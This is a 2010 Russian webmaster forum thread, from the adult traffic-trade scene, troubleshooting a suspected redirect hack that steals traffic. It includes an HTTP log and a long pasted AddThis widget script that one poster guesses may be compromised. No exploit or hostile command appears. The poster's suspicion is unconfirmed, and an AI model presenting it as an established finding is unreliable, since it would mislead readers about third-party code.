Master-X
Форум | Новости | Статьи
Главная » Форум » CJs » 
Тема: Воруют Траф
цитата
18/02/10 в 16:03
 Wesstyle
смотри выше
цитата
18/02/10 в 21:15
 sarduor
Stek писал:
Это партнеры, так что они оба в теме icon_smile.gif
В общем искал у них косяк с редиректом, найти не могу. Изначально даже не могу добиться того, что бы меня редиректнуло. Отключал ява скрипт, чистил куки - без разницы. Все отслеживаю через локальный снифер, он показывает чистую работу ST -> TE out -> сайт трейдера. Ни каких дополнительных скриптов , страниц нет.
Сам ST чист ( вроде бы ). Проверка файлов из админки говорит OK. В директориях тумбов никаких *.php нет, в /tmp тоже ничего, кроме файлов сессий и прочего мусора от стороннего софта. В st/admin/variables.php так же чисто.
В общем у меня сомнение "а есть ли мальчик", т.е. есть ли вообще хак с редиректом.

пробывал тоже, в лисе менял браузер плагином на ИЕ, англ. язык, англ. впн, отключал яву, яваскрипт, и нифига не увидел. для уверенности обновите основные файлы которые связаны с аутом, да и мониторьте запросы левые на попытку хака. пассы я думаю вы уже все поменяли icon_cool.gif
цитата
21/02/10 в 12:53
 P.S.
Таже проблема (( ,как решить ?

Заходит на галеру спонсора , в строке подгружается этот урл http:// itrxx . com/go.php и сразу редирект на различные странички такого вида



+ kasper ругается (((

"эта хрень срабатывает только один раз. после повторного клика уже ничего не грузит."
цитата
21/02/10 в 13:19
 X-dream
P.S. писал:
Таже проблема (( ,как решить ?


какие скрипты стоят?

есть ли на сервере панель (cpanel) типо или что-то подобное?

закрыт ли доступ к фтп по ип адресу?
цитата
21/02/10 в 13:52
 P.S.
X-dream писал:
какие скрипты стоят?
есть ли на сервере панель (cpanel) типо или что-то подобное?
закрыт ли доступ к фтп по ип адресу?


ST + STT,EPT

на сервере RCP panel.

Да закрыт
цитата
21/02/10 в 13:58
 Stek
RCP panel - это что за панель ?
цитата
21/02/10 в 14:04
 kebzu
Stek: это панель адвенседов фирмовая
цитата
21/02/10 в 14:06
 P.S.
Stek писал:
RCP panel - это что за панель ?

у advancedhosters есть cpanel и RCP
цитата
21/02/10 в 14:08
 kebzu
P.S.: попроси админов на вирусы проверить сервак
цитата
21/02/10 в 14:11
 P.S.
Спасибо
цитата
21/02/10 в 14:34
 magay
тоже видел на некоторых крупных сиджах такую хрень - http:// itrxx . com/fr.php
цитата
21/02/10 в 14:45
 X-dream
P.S. писал:
ST + STT,EPT
на сервере RCP panel.
Да закрыт


из общих скриптов только st - в этом направление искать надо...
цитата
21/02/10 в 14:52
 Stek
Судя по тому, что сейчас даже в variables ничего не пишут, а все скрипты так и остаются закрытые через ioncube , то подменяются исполняемые скрипты, хотя проверка ST из админки, выдает что все чисто.
цитата
21/02/10 в 16:58
 Benny
P.S. писал:
Таже проблема (( ,как решить ?
Заходит на галеру спонсора , в строке подгружается этот урл http:// itrxx . com/go.php и сразу редирект на различные странички такого вида

+ kasper ругается (((
"эта хрень срабатывает только один раз. после повторного клика уже ничего не грузит."


Так может фхг спонсора хакнуты? урл не помнишь?
цитата
23/02/10 в 21:20
 Maloy
так что так и нету не у кого идей как эту херьню найти?
цитата
23/02/10 в 22:44
 sarduor
проверял ещё раз, не увидел проблемы.
цитата
24/02/10 в 10:03
 zZzz
icon_neutral.gif

Последний раз редактировалось: zZzz (12/12/14 в 12:54), всего редактировалось 1 раз
цитата
27/02/10 в 05:30
 SEng
Maloy писал:
так что так и нету не у кого идей как эту херьню найти?

Раз происходит выборочный редирект, то значит что-то должно отфильтровывать по первому клику, ip и пр. Для этого управляющий скрипт должен получить первоначальную инфу о серфере, чтобы решить, что с ним делать.
То бишь какая-то часть скрипта должна подгружаться всегда. Как вариант- извне. Вот лог обращения к сайту:
Код:

http://greatxxxclips.com/

GET / HTTP/1.1
Host: greatxxxclips.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: _csoot=1267233887720; _csuid=4b10256d009cb30d; texpert=1:6:1:0:0:-1:0:0:ls:ls:
a: b
Cache-Control: max-age=0

HTTP/1.1 200 OK
Server: nginx/0.8.33
Date: Sat, 27 Feb 2010 01:45:11 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
----------------------------------------------------------
http://www.greatxxxclips.com/style/style.css

GET /style/style.css HTTP/1.1
Host: greatxxxclips.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7
Accept: text/css,*/*;q=0.1
Accept-Language: ru,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://greatxxxclips.com/
a: b
If-Modified-Since: Sat, 12 Dec 2009 15:50:40 GMT
Cache-Control: max-age=0

HTTP/1.1 304 Not Modified
Server: nginx/0.8.33
Date: Sat, 27 Feb 2010 01:45:12 GMT
Last-Modified: Sat, 12 Dec 2009 15:50:40 GMT
Connection: keep-alive
----------------------------------------------------------
Вывод картинок, убрано, чтобы не загромождать
----------------------------------------------------------
http://s7.addthis.com/js/152/addthis_widget.js

GET /js/152/addthis_widget.js HTTP/1.1
Host: s7.addthis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7
Accept: */*
Accept-Language: ru,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://greatxxxclips.com/
Cookie: psc=6; uid=4b10256d009cb30d
a: b
If-Modified-Since: Thu, 25 Feb 2010 12:17:23 GMT
If-None-Match: "b1088a-44db-4806bc3e0fac0"
Cache-Control: max-age=0

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Thu, 25 Feb 2010 12:17:23 GMT
Etag: "b1088a-44db-4806bc3e0fac0"
Date: Sat, 27 Feb 2010 01:45:12 GMT
Connection: keep-alive
Vary: Accept-Encoding
----------------------------------------------------------
Вывод картинок, убрано, чтобы не загромождать
----------------------------------------------------------
http://s7.addthis.com/js/152/addthis_widget.js

GET /js/152/addthis_widget.js HTTP/1.1
Host: s7.addthis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7
Accept: */*
Accept-Language: ru,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://greatxxxclips.com/
Cookie: psc=6; uid=4b10256d009cb30d
a: b
If-Modified-Since: Thu, 25 Feb 2010 12:17:23 GMT
If-None-Match: "b1088a-44db-4806bc3e0fac0"
Cache-Control: max-age=0

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Thu, 25 Feb 2010 12:17:23 GMT
Etag: "b1088a-44db-4806bc3e0fac0"
Date: Sat, 27 Feb 2010 01:45:13 GMT
Connection: keep-alive
Vary: Accept-Encoding
----------------------------------------------------------

----------------------------------------------------------

Как видно из лога, обращение идет к стороннему хосту s7.addthis.com.

Подружается навороченный скрипт:
http://s7.addthis.com/js/152/addthis_widget.js
Код:

/* (c) 2008, 2009 Add This, LLC */
var addthis_conf={ver:152};function addthis_onmouseover(b,f,d,c,h,a,g){if(h){addthis_config.username=h}if(a){addthis_language=a}addthis_content=g||"";return addthis_open(b,"share",d,c)}function addthis_onmouseout(){addthis_close()}function addthis_to(a){return addthis_sendto(a)}function addthis_invoke(e,c,d,f){addthis_config.username=f||_ate.pub();addthis_share.url=(c||b.addthis_url);addthis_share.title=(d||b.addthis_title);var b=window,g=addthis_share.url.toLowerCase(),a=addthis_share.title.toLowerCase();if(g===""||g==="[url]"){addthis_share.url=location.href}if(a===""||a==="[title]"){addthis_share.title=document.title}_ate.as(e);return false};if(!window._ate){var _atd="www.addthis.com/",_atr="//s7.addthis.com/",_atn="//l.addthiscdn.com/",_euc=encodeURIComponent,_duc=decodeURIComponent,_atu="undefined",_atc={dr:0,ver:250,loc:0,enote:"",cwait:500,tamp:-1,samp:0.005,camp:1,vamp:1,xamp:0.073,pamp:0.1,mamp:0.7,addr:-1,addt:1,xfl:!!window.addthis_disable_flash,abf:!!window.addthis_do_ab};(function(){try{var I=window.location;if(I.protocol.indexOf("file")===0){_atr="http:"+_atr}if(I.hostname.indexOf("localhost")!=-1){_atc.loc=1}}catch(N){}var L=navigator.userAgent.toLowerCase(),O=document,u=window,t=u.addEventListener,h=u.attachEvent,J=O.location,Q={win:/windows/.test(L),xp:/windows nt 5.1/.test(L)||/windows nt 5.2/.test(L),chr:/chrome/.test(L),iph:/iphone/.test(L),saf:/safari/.test(L),web:/webkit/.test(L),opr:/opera/.test(L),msi:(/msie/.test(L))&&!(/opera/.test(L)),ffx:/firefox/.test(L),ff2:/firefox\/2/.test(L),ie6:/msie 6.0/.test(L),ie7:/msie 7.0/.test(L),mod:-1},n={isBound:false,isReady:false,readyList:window.addthis_onload||[],onReady:function(){if(!n.isReady){n.isReady=true;var a=n.readyList;for(var b=0;b<a.length;b++){a[b].call(window)}n.readyList=[]}},addLoad:function(a){var b=u.onload;if(typeof u.onload!="function"){u.onload=a}else{u.onload=function(){if(b){b()}a()}}},bindReady:function(){if(A.isBound){return}A.isBound=true;if(O.addEventListener&&!Q.opr){O.addEventListener("DOMContentLoaded",A.onReady,false)}var a=window.addthis_product;if(a&&a.indexOf("f")>-1){A.onReady();return}if(Q.msi&&window==top){(function(){if(A.isReady){return}try{O.documentElement.doScroll("left")}catch(c){setTimeout(arguments.callee,0);return}A.onReady()})()}if(Q.opr){O.addEventListener("DOMContentLoaded",function(){if(A.isReady){return}for(var c=0;c<O.styleSheets.length;c++){if(O.styleSheets[c].disabled){setTimeout(arguments.callee,0);return}}A.onReady()},false)}if(Q.saf){var b;(function(){if(A.isReady){return}if(O.readyState!="loaded"&&O.readyState!="complete"){setTimeout(arguments.callee,0);return}if(b===undefined){var c=O.gn("link");for(var d=0;d<c.length;d++){if(c[d].getAttribute("rel")=="stylesheet"){b++}}var e=O.gn("style");b+=e.length}if(O.styleSheets.length!=b){setTimeout(arguments.callee,0);return}A.onReady()})()}A.addLoad(A.onReady)},append:function(b,a){A.bindReady();if(A.isReady){b.call(window,[])}else{A.readyList.push(function(){return b.call(window,[])})}}},A=n,v=function(q,l,p,c){if(!q){return p}if(q instanceof Array){for(var e=0,a=q.length,b=q[0];e<a;b=q[++e]){p=l.call(c||q,p,b,e,q)}}else{for(var d in q){p=l.call(c||q,p,q[d],d,q)}}return p},D=Array.prototype.slice,F=function(b){return D.apply(b,D.call(arguments,1))},E=function(a){return a.replace(/(^\s+|\s+$)/g,"")},M=function(a,b){return v(F(arguments,1),function(d,c){return v(c,function(l,i,e){l[e]=i;return l},d)},a)},j=function(b,a){return v(b,function(e,d,c){c=E(c);if(c){e.push(_euc(c)+"="+_euc(E(d)))}return e},[]).join(a||"&")},g=function(b,a){return v((b||"").split(a||"&"),function(i,l){var e=l.split("="),d=E(_duc(e[0])),c=E(_duc(e.slice(1).join("=")));if(d){i[d]=c}return i},{})},f={vst:[],rev:"$Rev: 74429 $",_euc:_euc,_duc:_duc,reduce:v,slice:F,strip:E,extend:M,toKV:j,fromKV:g,bro:Q,clck:1,show:1,dl:J,camp:_atc.camp-Math.random(),samp:_atc.samp-Math.random(),vamp:_atc.vamp-Math.random(),tamp:_atc.tamp-Math.random(),pamp:_atc.pamp-Math.random(),xamp:_atc.xamp-Math.random(),mamp:_atc.mamp-Math.random(),ab:"-",scnt:1,seq:1,dcp:0,inst:1,wait:500,tmo:null,cvt:[],svt:[],sttm:new Date().getTime(),max:4294967295,pix:"tev",sid:0,sub:!!window.at_sub,dbm:0,uid:null,oot:null,swf:"//bin.clearspring.com/at/v/1/button1.6.swf",evu:"//o.addthis.com/at/",spt:"static/r07/widget13.png",ifpp:null,trim:function(a,b){try{a=a.replace(/^[\s\u3000]+|[\s\u3000]+$/g,"");if(b){a=_euc(a)}}catch(b){}return a},gat:function(){},com:function(a){if(window.parent&&window.postMessage){window.parent.postMessage(a,"*")}else{f.ifm(a)}},ifwn:function(){var b=f;try{b.rec(b.sifr.contentWindow.name)}catch(c){}},ifm:function(b){if(addthis_wpl){var c=(addthis_wpl.split("#"))[0];window.parent.location.href=c+"#at"+b}return false},hash:window.location.hash,ifp:function(){var c=f,b=window.location.hash,i=0;if(b&&b.indexOf("#at")>-1){b=b.substr(3).split(";");for(var e in b){var d=b[e].length>3?b[e].substr(0,3):null;switch(d){case"ssh":i=1;c.ssh(b[e].substr(4));break;case"uid":i=1;c.asetup(b[e].substr(4));break}}if(i){if(!c.hash.length||c.hash==""){c.hash="#"}window.location.hash=c.hash}}if(c.gssh&&c.guid){clearInterval(c.ifpp)}},pmh:function(a){if(a.origin.slice(-12)==".addthis.com"){f.rec(a.data)}},_rec:[],rec:function(d){if(!d){return}var l=g(d),b=f,c=b.sifr,e=b._rec;if(l.ssh){b.ssh(l.ssh)}if(l.uid){b.asetup(l.uid)}if(l.dbm){b.dbm=l.dbm}if(c&&c.parentNode){}for(var p=0;p<e.length;p++){e[p](l)}},ssh:function(b){f.gssh=1;var a=window.addthis_ssh=_duc(b);f._ssh=a.split(",")},mun:function(c){var a=291;if(c){for(var b=0;b<c.length;b++){a=(a*(c.charCodeAt(b)+b)+3)&1048575}}return(a&16777215).toString(32)},jsl:function(){return((((u.jQuery||{}).fn||{}).jquery&&1)|((u.Prototype||{}).Version&&2)|((u.YUI||{}).version||(u.YAHOO||{}).VERSION&&4)|((u.Ext||{}).version&&8)|((u.dojo||{}).version&&16))},ibt:function(){if(f.bti){return f.bti}var a=(window.addthis_product||"men").substr(0,3),b=a=="bkm"||a=="fct"||a=="fxe";if(b){f.bti=b}return b},off:function(){return Math.floor((new Date().getTime()-f.sttm)/100).toString(16)},ran:function(){return Math.floor(Math.random()*4294967295).toString(36)},srd:function(){if(f.dr){return"&pre="+_euc(f.dr)}else{return""}},cst:function(a){return"CXNID=2000001.521545608054043907"+(a||2)+"NXC"},imgz:[],hrr:function(c){if(c&&c.urls&&c.urls instanceof Array){for(var b=0;b<c.urls.length;b++){var a=new Image();f.imgz.push(a);a.src=c.urls[b]}}},omp:function(){f.img(_atc.ver+"sh","3");if(f.lng().indexOf("en")==0){if(f.mamp>=0){f.xred(200)}}},img:function(p,r,b){if(!window.at_sub&&!_atc.xtr){var e=f,q=e.dr,d=((e.rev||"").split(" "));if(q){q=q.split("?").shift().split("http://").pop().split("https://").pop();if(q.length>25){q=q.substr(0,25)}}var l=new Image();e.imgz.push(l);l.src=_atn+"live/t00/"+p+".gif?"+(e.uid!==null?"uid="+e.uid+"&":"")+e.ran()+"&"+e.cst(r)+(e.pub()?"&pub="+e.pub():"")+(q?"&dr="+_euc(q):"")+(d.length>1?"&rev="+d[1]:"")+(b?"&"+b:"")}},cuid:function(){return((f.sttm/1000)&f.max).toString(16)+("00000000"+(Math.floor(Math.random()*(f.max+1))).toString(16)).slice(-8)},ssid:function(){if(f.sid===0){f.sid=f.cuid()}return f.sid},sev:function(b,a){f.pix="sev-"+(typeof(b)!=="number"?_euc(b):b);f.svt.push(b+";"+f.off());if(a===1){f.xmi(true)}else{f.sxm(true)}},cev:function(b,a){f.pix="cev-"+_euc(b);f.cvt.push(_euc(b)+"="+_euc(a)+";"+f.off());f.sxm(true)},sxm:function(a){if(f.tmo!==null){clearTimeout(f.tmo)}if(a){f.tmo=f.sto("_ate.xmi(false)",f.wait)}},sto:function(b,a){return setTimeout(b,a)},sta:function(){var b=f;return"AT-"+(b.pub()?b.pub():"unknown")+"/-/"+b.ab+"/"+b.ssid()+"/"+(b.seq++)+(b.uid!==null?"/"+b.uid:"")},xred:function(d){try{var s=window,ae=f,b=0,W=O.referer||O.referrer||"",T=J?J.href:null,aa=J?J.hostname.split(".").slice(-2).join("."):null,y=100,q=300,ac=0,p=1,l=2,x=4,V=ac,ad=".com/",Y=0;if(W){var U=W.split("//").pop().split("/").shift().split("?").shift().split(".").slice(-2).join(".");if(U==aa){V|=l}else{V|=x}}if(((ae.camp>=0&&(W.indexOf(ad)>-1&&W.indexOf("addthis")==-1))||d)&&(T&&J&&J.protocol&&(J.protocol.indexOf("https")==-1))){if(W&&W.match(/ws\/results\/(Web|Images|Video|News)/)){Y=1;V|=p}else{if(W.indexOf(ad+"search")>-1||W.indexOf(ad+"url")>-1||W.indexOf(ad+"web")>-1||W.indexOf(ad+"aol")>-1||W.indexOf(ad+"s?bs")>-1||W.indexOf("hotbot"+ad)>-1){var S=W.split("?").pop().split("&");for(var Z=0;Z<S.length;Z++){if(S[Z].indexOf("q=")===0||S[Z].indexOf("bs=")===0||S[Z].indexOf("p=")===0||S[Z].indexOf("query")===0||S[Z].indexOf("qry")===0||S[Z].indexOf("text")===0){Y=1;break}}V|=p}}if(!ae.dcp&&!_atc.xtr&&!_atc.xck&&(Y||d)&&ae.mun(ae.pub())!=="mu2r"){if(!d){d=y}ae.dcp=d;var X=O.ce("script");X.src="//cf.addthis.com/red/p.json?rb="+V+"&gen="+d+"&callback=_ate.hrr"+(ae.pub()?"&pub="+ae.pub():"")+(ae.uid&&ae.uid!=="anonymous"?"&uid="+_euc(ae.uid):"")+"&url="+_euc(T)+(W?"&ref="+_euc(W):"")+"&"+ae.ran();O.gn("head")[0].appendChild(X)}}}catch(ab){}},xld:function(){var b=f,e={"6jb4":1,sirb:1,q8fc:1,mv86:1,qmo0:1},c=b.jsl(),d=b.mun(b.pub());if(!b.xld_p){b.xld_p=1;if(e[d]){_atc.samp/=4;b.samp=_atc.samp-Math.random()}if(b.samp>=0&&!b.sub){b.sev("20");b.cev("plo",Math.round(1/_atc.samp));if(b.dr){b.cev("pre",b.dr)}}if(b.xamp>=0&&b.lng().indexOf("en")==0){b.xred(100)}else{b.xred()}b.img(_atc.ver+"lo","2",c?"jsl="+c:"")}},xmi:function(r){var b=f,p=b.dl?b.dl.hostname:"";if(!b.uid){b.dck("X"+b.cuid())}else{b.coo()}if(b.cvt.length+b.svt.length>0){b.sxm(false);if(b.seq===1){b.cev("pin",b.inst)}if(_atc.xtr){return}if(p.indexOf(".gov")>-1||p.indexOf(".mil")>-1){_atc.xck=1}var s=b.pix+"-"+b.ran()+".png?ev="+f.sta()+"&se="+b.svt.join(",")+"&ce="+b.cvt.join(",")+(_atc.xck?"&xck=1":""),e=b.evu+s;b.cvt=[];b.svt=[];if(r){var q=document,l=q.ce("iframe");l.id="_atf";l.src=e;f.opp(l.style);q.body.appendChild(l);l=q.getElementById("_atf")}else{var c=new Image();b.imgz.push(c);c.src=e}}},loc:function(){return _atc.loc},opp:function(a){a.width=a.height="1px";a.position="absolute";a.zIndex=100000},pub:function(){return _euc(window.addthis_config&&addthis_config.username?addthis_config.username:(window.addthis_pub||""))},plo:[],lad:function(a){f.plo.push(a)},lng:function(){return window.addthis_language||(window.addthis_config||{}).ui_language||(f.bro.msi?navigator.userLanguage:navigator.language)},ivl:function(a){var b={af:1,afr:"af",ar:1,ara:"ar",az:1,aze:"az",be:1,bye:"be",bg:1,bul:"bg",bn:1,ben:"bn",bs:1,bos:"bs",ca:1,cat:"ca",cs:1,ces:"cs",cze:"cs",cy:1,cym:"cy",da:1,dan:"da",de:1,deu:"de",ger:"de",el:1,gre:"el",ell:"ell",es:1,esl:"es",spa:"spa",et:1,est:"et",fa:1,fas:"fa",per:"fa",fi:1,fin:"fi",fo:1,fao:"fo",fr:1,fra:"fr",fre:"fr",ga:1,gae:"ga",gdh:"ga",gl:1,glg:"gl",he:1,heb:"he",hi:1,hin:"hin",hr:1,cro:"hr",hu:1,hun:"hu",id:1,ind:"id",is:1,ice:"is",it:1,ita:"it",ja:1,jpn:"ja",ko:1,kor:"ko",lb:1,ltz:"lb",lt:1,lit:"lt",lv:1,lav:"lv",mk:1,mac:"mk",mak:"mk",ms:1,msa:"ms",may:"ms",nb:1,nl:1,nla:"nl",dut:"nl",no:1,nno:"no",oc:1,oci:"oc",pl:1,pol:"pl",pt:1,por:"pt",ro:1,ron:"ro",rum:"ro",ru:1,rus:"ru",sk:1,slk:"sk",slo:"sk",sl:1,slv:"sl",sq:1,alb:"sq",sr:1,ser:"sr",sv:1,sve:"sv",swe:"sv",ta:1,tam:"ta",te:1,teg:"te",th:1,tha:"th",tl:1,tgl:"tl",tr:1,tur:"tr",uk:1,ukr:"uk",ur:1,urd:"ur",vi:1,vie:"vi","zh-hk":1,"chi-hk":"zh-hk","zho-hk":"zh-hk","zh-tr":1,"chi-tr":"zh-tr","zho-tr":"zh-tr","zh-tw":1,"chi-tw":"zh-tw","zho-tw":"zh-tw",zh:1,chi:"zh",zho:"zh"};if(b[a]){return b[a]}a=a.split("-").shift();if(b[a]){if(b[a]===1){return a}else{return b[a]}}return 0},alg:function(e,c){var i=document,a=(e||f.lng()||"en").toLowerCase(),b=f.ivl(a);if(a.indexOf("en")!==0&&(!f.pll||c)){if(b){if(b!==1){a=b}f.pll=f.ajs("static/r07/lang00/"+a+".js")}}},jlr:{},ajs:function(a){if(!f.jlr[a]){var b=O.ce("script");b.src=_atr+a;O.gn("head")[0].appendChild(b);f.jlr[a]=1;return b}return 1},jlo:function(){try{var p=document,b=f,l=b.lng();b.alg(l);if(!b.pld){if(b.bro.ie6){var c=new Image();b.imgz.push(c);c.src=_atr+b.spt;if(window.addthis_feed){c=new Image();b.imgz.push(c);c.src=_atr+"static/r05/feed00.gif"}}if(b.pll&&!window.addthis_translations){b.sto(function(){b.pld=b.ajs("static/r07/menu46.js")},10)}else{b.pld=b.ajs("static/r07/menu46.js")}}}catch(i){}},igv:function(a,b){if(!u.addthis_share){u.addthis_share={}}if(!addthis_share.url){u.addthis_share.url=u.addthis_url||a}if(!addthis_share.title){u.addthis_share.title=u.addthis_title||b}if(!u.addthis_config){u.addthis_config={username:u.addthis_pub}}else{if(addthis_config.data_use_flash===false){_atc.xfl=1}if(addthis_config.data_use_cookies===false){_atc.xck=1}}},lod:function(S){try{var U=window,ak=f,x=ak.bro.msi,d=0,Z=O.referer||O.referrer||"",X=J?J.href:null,ag=J.hostname,aj=X?X.indexOf("sms_ss"):-1,ah=((S===1||U.addthis_load_flash)&&!_atc.abf),ac=((U.addthis_language||(U.addthis_config?U.addthis_config.ui_language:null)||(ak.bro.msi?navigator.userLanguage:navigator.language)).split("-")).shift(),s=(J.href.indexOf(_atr)==-1)&&!ak.bro.ie6&&!ak.bro.ie7,ad=O.gn("link"),q=_atr+"static/r07/sh11.html",y="_ate.ifwn()",r,T;if(!U.postMessage){var W=O.gn("img");for(var ae=0;ae<W.length;ae++){if(W[ae].src.split("//").pop().indexOf(ag)==0){r=W[ae].src;break}}}if(s&&(!_atc.xic||(U.postMessage||ak.bro.msi))){if(!x){T=O.ce("iframe")}else{var V=O.ce("div");V.style.visibility="hidden";ak.opp(V.style);O.body.insertBefore(V,O.body.firstChild);V.innerHTML='<iframe id="_atssh" width="1" height="1" name="_atssh" '+(!U.postMessage?'onload="'+y+'" ':"")+">";T=O.getElementById("_atssh")}}for(var ae=0;ae<ad.length;ae++){var ab=ad[ae];if(ab.rel&&ab.rel=="canonical"&&ab.href){X=ab.href}}ak.igv(X,O.title||"");ak.gov();ak.dr=Z;var p=(ak.swf&&!_atc.xfl&&!(ak.loc())&&!_atc.abf&&(ah||ak.uid===null||(ak.uid!=="anonymous"&&ak.oot&&((new Date()).getTime()-ak.oot>60480000))));q+="#swfp="+(p&&x?1:0)+(Z&&Z!=X?"&dr="+_euc(Z):"")+"&du="+_euc(X)+(ak.xamp>0?"&px=1":"")+"&vr="+_euc(_atc.ver)+(_atc.xck?"&xck=1":"")+"&psp="+(Math.ceil(1/_atc.pamp));if(!x&&p){var c=function(e,l,a){var i=O.ce("param");i.name=l;i.value=a;e.appendChild(i)},V=O.ce("div"),Y="atff",b=Y+"c",aa=O.ce("object");V.id=b;O.body.insertBefore(V,O.body.firstChild);setTimeout(function(){var a=O.getElementById(b);aa.id=Y;aa.data=ak.swf;aa.width=aa.height="1px";aa.type="application/x-shockwave-flash";c(aa,"wmode","transparent");c(aa,"allowScriptAccess","always");a.appendChild(aa)},10)}if(s&&T){T.id="_atssh";ak.opp(T.style);T.frameborder=T.style.border=0;T.style.top=T.style.left=0;if(U.postMessage){T.src=q;if(x){U.attachEvent("onmessage",ak.pmh)}else{U.addEventListener("message",ak.pmh,false)}T=O.body.appendChild(T)}else{if(r&&!_atc.xic&&ak.bro.msi&&window==top){T.onload=y;T.src=r;T=O.body.appendChild(T);T.src=q+"&wpl="+_euc(r)}}ak.sifr=T}if(!ah){if(p){ak.uoo();if(ak.bro.ie6||ak.bro.ie7){ak.sto("if (_ate.xld) _ate.xld()",5000)}else{ak.sto("_ate.xld()",5000)}}else{ak.guid=1;ak.xld()}if(aj>-1&&X.indexOf(_atd+"book")==-1){var af=X.substr(aj);af=af.split("&").shift().split("#").shift().split("=").pop();if(ak.vamp>=0&&!ak.sub&&af.length){ak.cev("plv",Math.round(1/_atc.vamp));ak.cev("rsc",af)}}}if(window.addthis_language||(window.addthis_config||{}).ui_language){ak.alg()}if(ak.plo.length>0){ak.jlo()}}catch(ai){}},kck:function(a){var b=document;if(b.cookie){b.cookie=a+"= ; expires=Tue, 31 Mar 2009 05:47:11 UTC; path=/"}},rck:function(e){var p=document;if(p.cookie){var b=p.cookie.split(";");for(var l=0;l<b.length;l++){var q=b[l],a=q.indexOf(e+"=");if(a>=0){return q.substring(a+(e.length+1))}}}return},uoo:function(){f.sck("_csoot",(new Date().getTime()))},coo:function(a){if(f.uid=="anonymous"&&!f.oot){_atc.xck=1;f.uoo()}},dck:function(a){f.uid=a;f.sck("_csuid",a);f.coo()},gov:function(){var b=f.dl?f.dl.hostname:"";if(b.indexOf(".gov")>-1||b.indexOf(".mil")>-1){_atc.xck=1;_atc.xfl=1}var c=f.pub(),a=["usarmymedia","govdelivery"];for(K in a){if(c==a[K]){_atc.xck=1;_atc.xfl=1;break}}},sck:function(b,a,c){f.gov();if(!_atc.xck){O.cookie=b+"="+a+(!c?"; expires=Wed, 04 Oct 2028 03:19:53 GMT":"")+"; path=/"}},asetup:function(b){var c=f;try{if(!c.guid){c.guid=1;if(b!==null&&b!==_atu){c.dck(b)}c.xld()}}catch(d){}return b},ao:function(b,i,e,c,d,a){f.lad(["open",b,i,e,c,d,a]);f.jlo();return false},ac:function(){},as:function(b,c,a){f.lad(["send",b,c,a]);f.jlo()}},R=f;u._ate=R;u._adr=A;O.ce=O.createElement;O.gn=O.getElementsByTagName;A.bindReady();if(!_atc.ost){if(!u.addthis_conf){u.addthis_conf={}}for(var K in addthis_conf){_atc[K]=addthis_conf[K]}_atc.ost=1}A.append(R.lod);if(O.cookie){var m=O.cookie.split(";");for(var K=0;K<m.length;K++){var P=m[K],o=P.indexOf("_csuid="),k=P.indexOf("_csoot=");if(o>=0){f.uid=P.substring(o+7)}else{if(k>=0){f.oot=P.substring(k+7)}}}}try{if(!_atc.xcs){var I=O.ce("link");I.rel="stylesheet";I.type="text/css";I.href=_atr+"static/r07/widget29.css";I.media="all";O.gn("head")[0].appendChild(I)}}catch(N){}var H=O.gn("script"),z=H[H.length-1],B=z.src.indexOf("#")>-1?z.src.replace(/^[^\#]+\#?/,""):z.src.replace(/^[^\?]+\??/,""),C=g(B);if(C.pub){u.addthis_pub=_duc(C.pub)}else{if(C.username){u.addthis_pub=_duc(C.username)}}if(u.addthis_pub&&u.addthis_config){u.addthis_config.username=u.addthis_pub}if(C.domready){_atc.dr=1}try{if(_atc.ver===120){var G="atb"+u._ate.cuid();O.write('<span id="'+G+'"></span>');u._ate.igv();u._ate.lad(["span",G,addthis_share.url||"[url]",addthis_share.title||"[title]"])}if(u.addthis_clickout){f.lad(["cout"])}}catch(N){}})();function addthis_open(b,f,e,c,d,a){if(typeof d=="string"){d=null}return _ate.ao(b,f,e,c,d,a)}function addthis_close(){_ate.ac()}function addthis_sendto(b,c,a){_ate.as(b,c,a);return false}if(_atc.dr){_adr.onReady()}}else{_ate.inst++}if(_atc.abf){addthis_open(document.getElementById("ab"),"emailab",window.addthis_url||"[URL]",window.addthis_title||"[TITLE]")};


Очень может быть, что в нем и происходит то самое действие.
За подгрузку скрипта отвечает код в шаблоне страницы:
Код:
<!-- AddThis Button BEGIN -->
<script type="text/javascript">var addthis_pub="kostya83";</script>
<a href="http://www.addthis.com/bookmark.php" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()"><img src="http://s7.addthis.com/static/btn/lg-bookmark-en.gif" width="125" height="16" border="0" alt="Bookmark and Share" style="border:0"/></a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
<!-- AddThis Button END -->


Это код виджета для добавления букмарков.
Попробуйте удалить из шаблона это виджет полностью.
Может быть дело в нем (взломан например).
цитата
04/03/10 в 14:49
 zZzz
icon_confused.gif

Последний раз редактировалось: zZzz (12/12/14 в 12:53), всего редактировалось 1 раз
цитата
04/03/10 в 18:23
 kebzu
Лесной: джою чтото написал?
цитата
26/06/10 в 15:31
 Vyacheslav
Блин. Самое интересное, что через просмотр кода можно не всегда обнаружить эту проблему.
Тем более она работает как я понял только для избранных IP.
